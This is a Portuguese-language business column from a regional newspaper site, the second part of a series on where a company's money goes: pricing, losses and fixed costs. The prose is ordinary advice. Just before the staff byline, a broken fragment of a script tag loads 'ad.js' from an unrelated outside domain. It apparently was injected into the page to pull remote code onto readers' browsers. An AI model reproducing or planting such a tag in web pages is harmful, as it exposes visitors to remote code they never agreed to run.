InícioDestaquePorque eu Vendo Muito, mas não vejo Dinheiro Sobrar? Ep. 2

Porque eu Vendo Muito, mas não vejo Dinheiro Sobrar? Ep. 2

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

Pessoal, boa semana pra vocês……

Vamos continuar com a explanação da nossa temporada referente aos esconderijos do seu dinheiro na “complexa” matemática da sua empresa…..

Prontos para a segunda etapa da nossa temporada?

Vamos lá?

 

3 – Precificação

A precificação é o valor apresentado ao consumidor do respectivo bem, ou produto. Nessa precificação, todos os custos que fazem parte do bem ou produto já devem ter sido acoplados, para que a precificação final gere lucro. Esse é um grande problema: Mas quais são e qual é o valor desses custos?

 

Sem titubear, a precificação é um grande problema dentro de comércios, indústrias e prestação de serviço. E vocês devem ficar pensando: Mas por que? SIMPLES…..O pessoal não sabe quanto custa, logo não consegue precificar a contento para que a empresa gere lucro. Essa precificação, ou preço de venda, deve pagar os impostos de saída, as perdas, os fretes, as comissões, as embalagens, os custos fixos e o lucro. Parece simples mas não é…..e ai eu pergunto….seu dinheiro pode estar parado na precificação? COM CERTEZA ABSOLUTAAAA…….por falta de conhecimento de custos e definição de margem de lucro.

 

 

4 – Perdas

A perda nada mais é do que desperdício. Imagine uma caixa d’água de 500 litros, cheia de água, e aos poucos vão surgindo buracos nessa caixa d’água pelas laterais, pelo fundo, enfim, por vários locais, e alguns bem difíceis de encontrar……pois é…..difícil né?

 

Agora vamos fazer a analogia dessa Caixa D’água com a sua empresa:

Imagine uma empresa, com vários setores, lucrativa e saudável com a gestão atual. Um belo dia muda a gestão da empresa, talvez alguém não tão preparado, ou sem conhecimento suficiente começa a comandar o negócio. O que fatalmente vai acontecer…..sua empresa vai começar a ter pequenos buracos, chamados de perdas. Nos mais diversos setores essas perdas acontecem, e sempre serão relacionadas ao dinheiro que você está deixando de ganhar. As perdas podem ser diversas como: avarias, desperdícios, manuseio, processos desajustados, ociosidades, rotas mal planejadas, utilização desnecessária de equipamento, etc, etc, etc…….E diante desse cenário….você acredita que parte do seu dinheiro pode estar nas perdas? Rssss….SEM COMENTÁRIOS…não precisa nem ser muito esperto para ter certeza disso……portanto vá investigar na sua empresa, pois seu dinheiro pode estar saindo por algum buraco desses. Dá uma olhada lá…

 

 

5 – Custos Fixos

Os custos fixos, nada mais são que as despesas operacionais que sustentam a operação do seu negócio. Ex.: água, luz, telefone, salários, encargos, pró-labore, propaganda, gráfica, manutenção, contabilidade, etc, etc, etc…….E com qual dinheiro você acredita que os custos fixos são pagos? Com o Lucro Bruto, que nada mais é do que a sobra do montante de venda menos os custos variáveis…..Importante lembrar também que os Custos Fixos são os custos mais difíceis de serem baixados, pois dependemos de um exército de pessoas com uma cultura pra lá de comprometida para fazer com que essa economia apareça…..

 

Muito bem, após esse breve preâmbulo, é muito importante dizer que nos custos fixos existem uma série de desembolsos desnecessários……por exemplo para o comércio…..7,0% de folha de salários sem encargos vs sua venda bruta…é bom ou é ruim? Os desembolsos com energia girando na casa de 0,7% da sua venda, é bom ou é ruim? A propaganda da sua empresa comprometendo 2,0% da sua venda bruta mensal, é bom ou é ruim? Pois é….se não houver uma interpretação coerente dos números, a tomada de decisão será com certeza absoluta EQUIVOCADA, e você continuará pensando…onde está minha grana? Trabalho o mês todo para ganhar só isso? Categoricamente, e sem medo de errar, é certeiro que muito do seu dinheiro está parado no seu Custo Fixo, mas não porque o dinheiro quer ficar lá, mas sim por falta de competência de gestão……Pense nisso e reavalie suas despesas senão essa brincadeira de Gato e Rato….o Ratinho sempre vai ganhar……

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.